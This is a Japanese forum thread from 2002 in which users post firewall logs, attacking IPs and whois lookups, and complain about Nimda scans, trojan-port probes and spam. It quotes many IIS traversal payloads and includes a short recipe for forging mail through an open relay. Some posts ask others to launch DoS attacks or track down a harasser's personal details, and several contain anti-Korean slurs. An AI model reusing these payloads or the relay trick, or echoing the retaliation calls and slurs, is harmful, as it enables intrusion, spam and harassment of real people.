Received: from cc.sookmyung.ac.kr (203.252.201.4) by sitemail.everyone.net with SMTP; **
Received: from vv68gIjB6 (localhost [127.0.0.1]) by cc.sookmyung.ac.kr (8.9.3/8.9.3) with SMTP id ** (KST)
From: [email protected]
Date:**
Subject: Need Help? Benefactored Program...hurry don't miss out!
---
Hello Friends,
If you need HELP and would like to be benefactored
into a new FABULOUS
program, please let me know right away!! I will put
you into a
"temporary" matrix to hold your position until the
company allows us to enter
people on Feb. 4! The overflow will be enormous.
Please reserve your
spot now!
Send your info to
[email protected]
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to me [email protected]
---
egret.sookmyung.ac.kr (pri=20)
接続に失敗：ネットワークが混雑しているか、サーバが停止している可能性があります。
-----
cc.sookmyung.ac.kr (pri=10)
< 220-InterScan Version 3.6-Build_1166 $Date: 04/24/2001 22:13:0052$: Ready
< 220 cc.sookmyung.ac.kr ESMTP Sendmail 8.9.3/8.9.3;
> HELO rlytest.nanet.co.jp
< 250 cc.sookmyung.ac.kr Hello localhost [127.0.0.1], pleased to meet you
> MAIL FROM:< http://www.nanet.co.jp/rlytest/[email protected] >
< 250 < http://www.nanet.co.jp/rlytest/[email protected] >... Sender ok
> RCPT TO:<[email protected]>
< 250 <[email protected]>... Recipient ok
> QUIT
< 221 cc.sookmyung.ac.kr closing connection
問題あり：不正な中継を受け付けます。
(203.252.201.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

211.133.148.124
先生方、制裁お願いします

61.202.74.83
210.237.39.141
ファイヤーウォールでブロックしてます
正直言って初心者ですが、この人たちは何がしたいんでしょうか？
また、逆襲は出来ないのでしょうか？
どなたか教えていただけませんか？

>>241
うちにもきたぞ。

日付: 02/01/30 時刻: 20:05:26
規則「Default Block Backdoor/SubSeven Trojan」が ********,**** をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは ********,****
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.133.148.124,56490
ﾌﾟﾛｾｽ名は N/A

糞チョン ぅぜ〜　61.75.191.13

211.133.148.124
社員がやってるのか？
乗っ取られたのか？

　　　

誰かが制裁とやらをすると思ってるのか？

uxsv007.tbgu.ac.jp
決まった時間にメールサーバーのパスを走査してきやがる
どう考えても特定の人物の受講カリキュラムに連動しているとしか思えん
苦情申し立てても対応無し

211.211.251.154

ﾁｮﾝ、ウザい

あー、うざい。プロバイダのアドレスだとは思うけど。
いつもおんなじ攻撃パターン。うちはNTじゃないんだから、NT用の攻撃しても無駄だ。
もっと賢いツール使えよ。
おかげで、ログはエラーの山だ。

211.210.102.3 - - [31/Jan/2002:14:32:49 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
211.210.102.3 - - [31/Jan/2002:14:32:49 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
211.210.102.3 - - [31/Jan/2002:14:32:50 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
211.210.102.3 - - [31/Jan/2002:14:32:53 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284

こうやって書いている間に、また来てやがる。

>>250
Nimdaからの攻撃！　０ポイントのダメージを受けた！

パーティは全滅した．．．

迷惑メールをばら撒いて、自鯖へ誘導しているｳﾞｧｶを見付けたんですが、晒しても良いですか？
nslookup×２回で接続IPがバレることに気付いてない真性厨房で、懲らしめてやりたいです。

【一発目】
deai.mydns.to
　　↓
61.197.83.13
　　↓
pl013.nas941.k-tokyo.nttpc.ne.jp

【二発目】
game2.dyndns.tv→61.197.83.13→pl013.nas941.k-tokyo.nttpc.ne.jp

同一人物です。

↓ﾈﾀ元
http://love.2ch.net/test/read.cgi/kageki/1012452308/

右クリックサーチ君というフリーウェアにnslookupとかjpnicwhoisとか組合わせるとブラウザ上では便利ですよ。

インストールしたら３つほど追加するだけ。
CS-Nslookup
http://www8.big.or.jp/~000/CyberSyndrome/nslookup.cgi?q=%s
JPNIC-whois
http://whois.nic.ad.jp/cgi-bin/whois_gw?key=%s&lang=
Uwhois
http://www.uwhois.com/cgi/whois.cgi?query=%s

がいしゅつだと思いますけど、まだ使ってない人は試してみてください。

210.165.252.229
なんだコイツ？
いったいどこからなんだろう？

次はcmd.exeに1GBくらいのゴミデータ置いておきます。

[Thu Jan 31 05:06:08 2002] [error] [client 43.239.14.47] File does not exist: /usr/local/www/data/_vti_bin/..%5c../..%5c../..%5c..
/winnt/system32/cmd.exe

Received: from cc.sookmyung.ac.kr (203.252.201.4) by sitemail.everyone.net with SMTP; **
Received: from vv68gIjB6 (localhost [127.0.0.1]) by cc.sookmyung.ac.kr (8.9.3/8.9.3) with SMTP id ** (KST)
From: [email protected]
Date:**
Subject: Need Help? Benefactored Program...hurry don't miss out!
---
Hello Friends,
If you need HELP and would like to be benefactored
into a new FABULOUS
program, please let me know right away!! I will put
you into a
"temporary" matrix to hold your position until the
company allows us to enter
people on Feb. 4! The overflow will be enormous.
Please reserve your
spot now!
Send your info to
[email protected]
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to me [email protected]
---
egret.sookmyung.ac.kr (pri=20)
接続に失敗：ネットワークが混雑しているか、サーバが停止している可能性があります。
-----
cc.sookmyung.ac.kr (pri=10)
< 220-InterScan Version 3.6-Build_1166 $Date: 04/24/2001 22:13:0052$: Ready
< 220 cc.sookmyung.ac.kr ESMTP Sendmail 8.9.3/8.9.3;
> HELO rlytest.nanet.co.jp
< 250 cc.sookmyung.ac.kr Hello localhost [127.0.0.1], pleased to meet you
> MAIL FROM:< http://www.nanet.co.jp/rlytest/[email protected] >
< 250 < http://www.nanet.co.jp/rlytest/[email protected] >... Sender ok
> RCPT TO:<[email protected]>
< 250 <[email protected]>... Recipient ok
> QUIT
< 221 cc.sookmyung.ac.kr closing connection
問題あり：不正な中継を受け付けます。
(203.252.201.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

>>256
ウザい氏ね

ＩＰアドレスが残りません。
詳細はメールでくれ。

>>258
んだよ、使えってのか？
オープンリレー鯖。
こんなもん使う奴はスパマー決定

こんなもんはだまって使うんだＹＯ！
公表したら使えなくなっちゃうだＲＯ！　ぷんすか

218.120.186.60
こいつ。
ソフトバンクだってさ。なんでうちのポートつつきまくってんの？？

あほーがなんか調べてるってことかな？

inetnum 218.112.0.0 - 218.143.255.255
netname BBTECH
descr BB Technology Corp.
descr Nation wide network in Japan
country JP
admin-c TT123-AP, inverse
tech-c ST222-AP, inverse
mnt-by APNIC-HM, inverse
mnt-lower MAINT-JP-BBTECH, inverse
changed [email protected] 20010823
changed [email protected] 20010910
source APNIC


person Takeshi Tsutsui, inverse
address Nihonbashi Hakozaki bldg.
address 24-1,Nihonbashi Hakozaki-Cho
address Chuo-ku,Tokyo,103-0015,Japan
country JP
phone +81-3-5642-7796
fax-no +81-3-5641-7601
e-mail [email protected], inverse
nic-hdl TT123-AP, inverse
mnt-by MAINT-JP-BBTECH, inverse
changed [email protected] 20011105
source APNIC


person Satoru Tsurumaki, inverse
address Nihonbashi Hakozaki bldg.
address 24-1,Nihonbashi Hakozaki-Cho
address Chuo-ku,Tokyo,103-0015,Japan
country JP
phone +81-3-5642-7796
fax-no +81-3-5641-7601
e-mail [email protected], inverse
nic-hdl ST222-AP, inverse
mnt-by MAINT-JP-BBTECH, inverse
changed [email protected] 20020109
source APNIC

日付: 2002/02/01 時刻: 0:48:50
未使用ﾎﾟｰﾄ遮断機能が通信を遮断しました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 211.125.19.177,http(80)

koga005n017.ppp.infoweb.ne.jp

31/01/2002 05:22:59.643896 tun0 @100:23 b snoopy.auraline.co.jp,ftp -> ******.ap.plala.or.jp,ftp PR tcp len 20 44 -S　IN

61.196.117.*--

これってどの辺の地域かわかりますか？

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.196.112.0-61.196.127.0
b. [ネットワーク名] CNANET
f. [組織名] 株式会社秋田ケーブルテレビ
g. [Organization] Cable Networks Akita Co.,Ltd
m. [運用責任者] MO674JP
n. [技術連絡担当者] KO1131JP
p. [ネームサーバ] axt.cna.ne.jp
p. [ネームサーバ] axt2.cna.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/09/10
[返却年月日]
[最終更新] 2001/09/12 10:13:59 (JST)
[email protected]

63.229.12.218
こいつの情報調べられる人いますか？
アタックしてきました。

Tiny のログより。

01/Feb/2002 02:35:58 Shuout Port blocked; In TCP; 218.31.231.4:2087->localhost:80; Owner: no owner
01/Feb/2002 02:36:01 Shuout Port blocked; In TCP; 218.31.231.4:2087->localhost:80; Owner: no owner

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

inetnum: 218.31.0.0 - 218.31.255.255
netname: CHINANET-XJ
descr: CHINANET xinjiang province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: LZ38-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CN-CHINANET-XINJIANG
changed: [email protected] 20000701
changed: [email protected] 20020104
source: APNIC

person: Chinanet Hostmaster
address: A12,Xin-Jie-Kou-Wai Street
country: CN
phone: +86-10-62370437
fax-no: +86-10-62053995
e-mail: [email protected]
nic-hdl: CH93-AP
mnt-by: MAINT-CHINANET
changed: [email protected] 20000101
source: APNIC

person: LI ZHAO
address: XINJIANG DATA COMMUNICATINS BUREAU
address: 30 HUANGHE ROAD URUMQI XINJIANG
address: CHINA
country: CN
phone: +86-991-5820832
fax-no: +86-991-5820831
e-mail: [email protected]
nic-hdl: LZ38-AP
mnt-by: MAINT-CN-CHINANET-XINJIANG
changed: [email protected] 20010112
source: APNIC

>>267

http://www.mse.co.jp/ip_domain/


で自分で調べろ、ヴォケ。

43.231.96.79
11回もアタックしてきたボケ
どうやらYahooBBのヤツだな

大変です！
今時例のネタで大漁に釣れてます。

荒らさないで見守りましょう(w
http://sports.2ch.net/test/read.cgi/msports/1002695313/l50

…毎日釣られるなよ(w
結論：サーファーはバカだ。

>>271
ﾜﾗﾀｗ

>>271スレの611俺なんだけど
12:28に書き込んだ後12:30と12:34に釣れてる
まじで入れ食い(w

モロ見えｴﾛ画像とか貼ったらもっと釣れそうだ(w

2002/02/01 12:47:25, Quake Exploit, 194.65.14.168

>> 271
あおってみました。

ありがとう。>>619
ﾔﾊﾟｰｼおもろいと思う人多いわな(w

しかしショタなんてｱﾌｫサーファーにわかるんかいな（ｗ
他のスレもぱらぱらと読んだがマジつまんないネタしかない。
海のことしか知らん！って感じ。

2chに来てるのに2chの事全然しらん奴とかもいるので
炉理とか書いてもわからんかも？（ｗ

ｺﾞﾊﾞｸ（　´,_ゝ`）ﾌﾟｯ

赤帽自宅鯖でやってます。
アドレスは誰にも教えていないのに、
httpdのログ見たら毎日
61.73.185.95
から変なことされています。

中身は、
61.73.185.95 - - [01/Feb/2002:13:44:03 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
61.73.185.95 - - [01/Feb/2002:13:44:03 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
61.73.185.95 - - [01/Feb/2002:13:44:04 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
61.73.185.95 - - [01/Feb/2002:13:44:04 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
61.73.185.95 - - [01/Feb/2002:13:44:04 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
61.73.185.95 - - [01/Feb/2002:13:44:05 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323 "-" "-"
61.73.185.95 - - [01/Feb/2002:13:44:05 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323 "-" "-"
61.73.185.95 - - [01/Feb/2002:13:44:05 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
61.73.185.95 - - [01/Feb/2002:13:44:06 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
61.73.185.95 - - [01/Feb/2002:13:44:06 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
61.73.185.95 - - [01/Feb/2002:13:44:06 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
61.73.185.95 - - [01/Feb/2002:13:44:06 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
61.73.185.95 - - [01/Feb/2002:13:44:07 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289 "-" "-"
61.73.185.95 - - [01/Feb/2002:13:44:07 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289 "-" "-"
61.73.185.95 - - [01/Feb/2002:13:44:07 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
61.73.185.95 - - [01/Feb/2002:13:44:08 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"

ip->ドメインは、


% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)

inetnum: 61.72.0.0 - 61.77.255.255
netname: KORNET
descr: KOREA TELECOM
descr: KOREA TELECOM Internet Operating Center

赤帽だから意味無いけど、うざいよ〜

>>279
Nimda

>>282
うん。
Nimdaうざいよ〜

赤帽だから意味無いけどね。

また木馬か。。。。　203.184.208.132
ウザ

共用してんのかな?

木馬が着た。２１１．２４３．１７０．３３

ここに書き込んだら復習して頂けるのでしょうか？

>>284 >>286
木馬用ポートにアクセスが来たのを
「木馬が来た」っていうと
厨房と間違われるよ。。。。あ、厨房なのか！

>>287
あふぉ

61.1.180.162
61.134.187.210
61.134.216.64
61.136.139.85
61.159.164.153
61.163.106.82
61.168.68.84
61.170.137.215
61.171.71.187
61.174.142.200
61.174.149.231
61.176.180.25
61.180.67.197
61.181.142.150
61.182.30.28
61.185.247.168
61.187.225.65
61.188.103.141
61.188.177.100
61.188.24.236
61.198.228.32
61.33.111.244
61.37.88.122
61.74.129.137

ただいまメールボムを食らっております。
意図的なものではなく、相手の設定ミスっぽい・・・鬱だ(;´Д`)

Received: from cc.sookmyung.ac.kr (203.252.201.4) by sitemail.everyone.net with SMTP; **
Received: from vv68gIjB6 (localhost [127.0.0.1]) by cc.sookmyung.ac.kr (8.9.3/8.9.3) with SMTP id ** (KST)
From: [email protected]
Date:**
Subject: Need Help? Benefactored Program...hurry don't miss out!
---
Hello Friends,
If you need HELP and would like to be benefactored
into a new FABULOUS
program, please let me know right away!! I will put
you into a
"temporary" matrix to hold your position until the
company allows us to enter
people on Feb. 4! The overflow will be enormous.
Please reserve your
spot now!
Send your info to
[email protected]
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to me [email protected]
---
egret.sookmyung.ac.kr (pri=20)
接続に失敗：ネットワークが混雑しているか、サーバが停止している可能性があります。
-----
cc.sookmyung.ac.kr (pri=10)
< 220-InterScan Version 3.6-Build_1166 $Date: 04/24/2001 22:13:0052$: Ready
< 220 cc.sookmyung.ac.kr ESMTP Sendmail 8.9.3/8.9.3;
> HELO rlytest.nanet.co.jp
< 250 cc.sookmyung.ac.kr Hello localhost [127.0.0.1], pleased to meet you
> MAIL FROM:< http://www.nanet.co.jp/rlytest/[email protected] >
< 250 < http://www.nanet.co.jp/rlytest/[email protected] >... Sender ok
> RCPT TO:<[email protected]>
< 250 <[email protected]>... Recipient ok
> QUIT
< 221 cc.sookmyung.ac.kr closing connection
問題あり：不正な中継を受け付けます。
(203.252.201.4)
ORDB database...登録されています。注意注意注意！
maps realtime blackhole list...登録されていません。

61.24.114.174

日付: **/**/** 時刻:**:**:**
未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 211.236.164.55,http

43.239.14.47
連日278みたいなログ。暇やのう。
しかも、上ipのブラウザでひらくと、もれなくnimdaがもらえます。

211.178.132.167
木馬ヤローは氏ね死ね

笑いものだよ　（ ＾∀＾）ケラケラ

★★　宣伝　★★
モーニング娘祭り開催中です。
モーニング娘の着替え画像中心ですが、なぜかハメ撮り画像まで・・

トラフィックの軽いスポーツ板に入り口を設けました。
http://sports.2ch.net/test/read.cgi/sports/1012133721/41

ホームページ作りました
http://www.h2.dion.ne.jp/~iscariot/frame-jiu.htm
http://users.goo.ne.jp/h4_network/

日付: 02/02/02 時刻: 19:32:23
ｱﾄﾞﾚｽ 210.123.241.16 からの不
正侵入の試みを規則 Backdoor/Su
bSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断
によって検出しました｡

211.175.150.173木馬

どうでもいいが、木馬っていう言い方が流行ってるのか？

２／１（金）　Ｊ．Ｍ．ウェストンのドゴール（黒）

今日は、特に理由はありませんが、久し振りにＪ．Ｍ．ウェストンの最高峰ドゴールを履きたくなり、そのままの気分でセレクトしました。
黒の綿パンを履いていたので、深く考えずに黒にしました。
結果として、ボトムが同じような色合いですので、存在感溢れるドゴールでも、控えめで主張することはありません。
もともと、ドゴールであっても黒はそれほど目立つ色合いでないこともありますが、さりげなく合わせるには同系色でまとめると、全体コーディネートで靴が主張しすぎない、バランスのとれた感じになります。
ステッチがアッパーにまで縫い込まれたノルベジアン製法、トゥ部分のスキンステッチ、・・・などの細かな仕事が、９割以上ハンドメイドの９分仕立てで造り込まれているとのことで、派手で大振りなシルエットではありますが、いかにも上質感に溢れています。
（旧カタログを見ると、人手でアッパーに糸を縫い込む様子が載っていて、丁寧な造りをしていることがわかります。）
そのような手仕事の効果か、ゴツイシルエットの靴でありながらも、足にピッタリと吸い付くような履き心地も同時に実現しています。
やはり、履き始めは苦労しましたが、ほぼ馴染んできていて、履き心地もほぼ最高レベルです。
（同じドゴールの茶色は、完全に馴染んでいて最高レベルの履き心地ですが、この黒はまだそのレベルではありません。）
上質な存在感と最高の履き心地を両立する、この靴を履いていると、自分まで最高峰になったような気にしてくれる、そんな靴でもあります。

211.240.187.179
ﾁｮﾝｳｻﾞ

※　「凱歌の号砲」
　コーエーから、新手のシミュゲーが出ることを報される。どうすんだ。 『鋼鉄の咆哮２』も控えているってのに(-.-)。

自分にメールを出してみた。Message-IDを誤魔化せば発信元は判断できない。
Received: from cc.sookmyung.ac.kr (cc.sookmyung.ac.kr [203.252.201.4])
by ***.ne.jp with ESMTP id *for <*@*.ne.jp>; * +0900 (JST)
Received: from * (localhost [127.0.0.1])
by cc.sookmyung.ac.kr (8.9.3/8.9.3) with SMTP id * for <*@*.ne.jp>;* +0900 (KST)
Message-ID: <*@*.ne.jp>
From: "*" < [email protected] >
To: < [email protected] >
Subject:*　Date:*+0900
−−−
ＴＯを [email protected],[email protected]
ＳＭＴＰを cc.sookmyung.ac.kr
Ｆｒｏｍを [email protected]
にする。

211.208.35.162

ついさっき４回ほど受けました

210.81.163.92
210.166.77.250
157.1.51.104

>>308
何されたの?

202.232.171.12 its1.catv.ne.jp Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461) 　01/28(月)21:42
こいつは『これ、ゴマキのケー番』などと言って私の携帯番号を流しました。本物ハッカー様方こらしめてほしいです。
もしくはこいつのこれ以上の個人情報が知りたいです。メールください。お願いします。

ゾヌ使用しています。
先ほどから数分おきにくりかえしやってきますが何なんですか？

The firewall has blocked Internet access to your computer (TCP Port 6699) from 24.82.220.194 (TCP Port 2462) [TCP Flags: S].

Time: 02/02/03 15:21:06

202.232.171.12 its1.catv.ne.jp Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461) 　01/28(月)21:42
こいつは『これ、ゴマキのケー番』などと言って私の携帯番号を流しました。本物ハッカー様方こらしめてほしいです。
もしくはこいつのこれ以上の個人情報が知りたいです。メールください。お願いします。

nippon777@ . です。

ホットメールドットコムです。

なんかしてみて。

>>312-314
自分で相談しに行けば？
http://www.itscom.net/

63.12.2.252←こいつウッゼ〜なんとかして

>>311
6699はWinMXの使用ポート。

最近、韓国からの木馬が多いねぇ

218.147.175.30

今↑の奴が攻撃してきた！！
くそったれ野郎！！
DOS攻撃してやってくれ！！！

210.113.78.66
何度もやってきてなんか韓国らしいんだけど・・・マイッタナァ

体調不良のtisotope - 02/02/03 09:51:33
電子メールアドレス:[email protected]


コメント:
こんにちは。どうも最近、夜になると熱が出てきていまして、これはお医者さんに診てもらった方がいいかな？とも感じています。

>>320
inetnum: 218.144.0.0 - 218.159.255.255
netname: KORNET
descr: KOREA TELECOM

韓国人だな〜。暇人多いな〜〜。

http://www.top.or.jp/~godhand/a2.html

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

Japan Inet (NET-JAPAN-A)
JP

Netname: JAPAN-A
Netblock: 43.0.0.0 - 43.255.255.255

Coordinator:
Murai, Jun (JM292-ARIN) [email protected]
+81 466 47 5111 ext. 3330 ext. 3330

Domain System inverse mapping provided by:

NS1.V6NIC.NET 210.134.160.187
NS2.V6NIC.NET 210.134.160.188

Record last updated on 27-Sep-2001.
Database last updated on 2-Feb-2002 19:55:50 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.


JAPANだった。珍しい〜（ｗ

日付: 2002/02/04 時刻: 0:14:52
未使用ﾎﾟｰﾄ遮断機能が通信を遮断しました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは www.wcbbs.com(211.127.164.28),auth(113)

211.176.183.60

トロイを探してたバカ。あるわけないだろ・・・・。
でも、IPからホスト調べることができない。何でだ？
情報求む

(ﾟДﾟ)ﾊｧ?　

http://www.puchiwara.com/hacking/

/ | | | |ヽ　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　@ﾉﾉヽヽヽ@
|(　ﾟ〜ﾟ )|　ノノﾉ人ヽ_　（ノ~＼＼　　　　　 　 ﾉﾉﾉﾉ从ﾍ　ﾉﾉﾉﾉヽヽ (０＾〜＾０)
|（　　　）| (●´ー｀●） （｀.∀´）　ノハヽヽ.　 |( ´Д｀ )|　从＾▽＾从 （　　　）
　| ｜ |　　（　　　　）　 （　　　） 从 ^◇^ 从 |（　　　）|　 （　　　） 　.| ｜ |
　| ｜ |　　｜　| 　 |　　｜｜｜　（　　　　） 　｜｜｜　 　| ｜ |　 　| ｜ |
（＿）__）　 （_＿）＿）　（＿_）＿） （＿）＿） 　 （＿）__） 　（＿）__）　（＿）__）
　飯田　　　 安倍　　　 保田　　　矢口　　　 後藤　　　 石川　　 吉澤

　　　　　　　 　　 ﾉﾉﾉﾉヽヽ　 .ﾉﾉﾉﾉ从ﾍ 　 / | | | |ヽ
∋oノハヽヽo∈ ∬｀▽´∬　川’ー’川 　川o･-･)　　 ◎ﾉ＾＾ヽ◎　　＠ノハ＠
　　(　´�D｀) 　　 （　　　） 　　（　　　）　　　（　　　）　 §(´・e・｀)§ 　(‘д‘ )
　　（　　　）　　　 ｜｜｜ 　　｜｜｜　　　｜｜｜ 　　 （　　　）　　　（　　　）
　　（＿）＿）　　 （＿）__） 　　（＿）__） 　　 （＿）__） 　　（＿）＿）　　 （＿）＿）
　　　 　辻　 　　　小川　　　　高橋　 　　 　紺野 　　　 新垣 　　　　加護

>>327
211.176.183.60で http://whois.nic.or.kr/ のWhois検索をかけた結果。

# ENGLISH

IP Address : 211.176.183.0-211.176.183.255
Network Name : BUCHEONSO
Connect ISP Name : HANANET
Connect Date : 20000907
Registration Date : 20000919

[ Organization Information ]
Orgnization ID : ORG109646
Org Name : Thrunet Co.,Ltd
State : SEOUL
Address : 1338-5 SEOCHO-2DONG SEOCHO-KU
Zip Code : 137-072

[ Admin Contact Information]
Name : Myungsun Noh
Org Name : Thrunet Co.,Ltd
State : SEOUL
Address : 1338-5 SEOCHO-2DONG, SEOCHO-KU
Zip Code : 137-072
Phone : +82-2-3488-8452
Fax : +82-2-3488-8777
E-Mail : [email protected]

[ Technical Contact Information ]
Name : Myungsun Noh
Org Name : Thrunet Co.,Ltd
State : SEOUL
Address : 1338-5 SEOCHO-2DONG, SEOCHO-KU
Zip Code : 137-072
Phone : +82-2-3488-8452
Fax : +82-2-3488-8777
E-Mail : [email protected]

未使用ﾎﾟｰﾄ遮断機能が通信を遮断しました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは www.wcbbs.com(211.127.164.28),auth(113)

IP Address : 211.190.15.0-211.190.15.63
Network Name : MISPACE
Connect ISP Name : SHINBIRO
Connect Date : 20000915
Registration Date : 20000919

[ Organization Information ]
Orgnization ID : ORG128342
Org Name : MISPACE
State : SEOUL
Address : 824-21 Yuksam-Dong Kangnam-Gu
Zip Code : 135-080

[ Admin Contact Information]
Name : Jinhwan Kim
Org Name : MISPACE
State : SEOUL
Address : 824-21 Yuksam-Dong Kangnam-Gu
Zip Code : 135-080
Phone : +82-2-568-9111
Fax : +82-2-564-0151
E-Mail : [email protected]

[ Technical Contact Information ]
Name : Jinhwan Kim
Org Name : MISPACE
State : SEOUL
Address : 824-21 Yuksam-Dong Kangnam-Gu
Zip Code : 135-080
Phone : +82-2-568-9111
Fax : +82-2-564-0151
E-Mail : [email protected]

木馬。暇だねぇ、韓国人は他にやる事ないのか？

211.106.36.10

日付: 2002/02/04 時刻: 20:48:53
未使用ﾎﾟｰﾄ遮断機能が通信を遮断しました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 211.125.202.173,http(80)

hccd37dcaad.bai.ne.jp

river1-cacheflow1.na1.dl.cidera.com
これ抜いて

私は、たぶん貴方よりネットワーク歴は長いです。貴方より、より多く
の時間をネットワーク活動に割くことが出来ます。年がら年中、どこか
のバトルに口出しして今も腕を磨いています。で、貴方よりネットワー
ク・スキルが若干高いと思われます (←ただの謙遜だからね)。
　私に喧嘩を売っても、たぶん、貴方自身が不愉快な思いをするだけで
す。相当後悔するかも知れません。悪いことは言いません。ここで読ん
だことは綺麗に忘れて平和な明日を過ごしましょう。
　それでも、私に喧嘩を売りたいという方は、このページのスキルに関
する項目を読んでからにしましょう。遺憾ながら、貴方のネットワーク
・スキル向上のために、私が協力できることは何もありません。私を巻
き込まないでください。

誰かこのアホにネットのスキルを教えてやって下さい（藁
http://www.ne.jp/asahi/eiji/home/main/eiji.htm

他人のパソコンを足がかりにしてたりするんじゃないのか

210.170.25.184 - - [05/Feb/2002:00:59:37 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-"
210.170.25.184 - - [05/Feb/2002:00:59:37 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-"
210.170.25.184 - - [05/Feb/2002:00:59:38 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-"
210.170.25.184 - - [05/Feb/2002:00:59:38 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-"
210.170.25.184 - - [05/Feb/2002:00:59:39 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "
210.170.25.184 - - [05/Feb/2002:00:59:42 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "
210.170.25.184 - - [05/Feb/2002:00:59:46 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "

184.25.170.210.in-addr.arpa. domain name pointer cr1-25-184.seaple-n.icc.ne.jp.

この馬鹿数分おきに来るんすけど、、、NIMDAを模倣した
自作のHACKツールとかなんでしょうか？
無駄にログファイルが切り替わってうざいです。。。

Proxy:211.13.66.114[unsolved] ctcur2ds22.iba.mesh.ad.jp
こういう掲示板荒らし屋がいるんです。
削除されようが蒸しされようがしつこく荒らし続けるので、そろそろ
他の対策を取りたいんですが、上の情報からプロバイダとかって分かるのでしょうか？

＞＞３４０
BIGLOBEでしょ。しったかぶりする奴を叩くための罠？
おーこわいこわい。。

しかも茨城県。(・∀・)ｲﾅｶﾓﾉﾊｱﾗｼﾄｾｸｰｽｼｶﾀﾉｼﾐｶﾞﾅｲﾖ!

>>337
＞誰かこのアホにネットのスキルを教えてやって下さい（藁
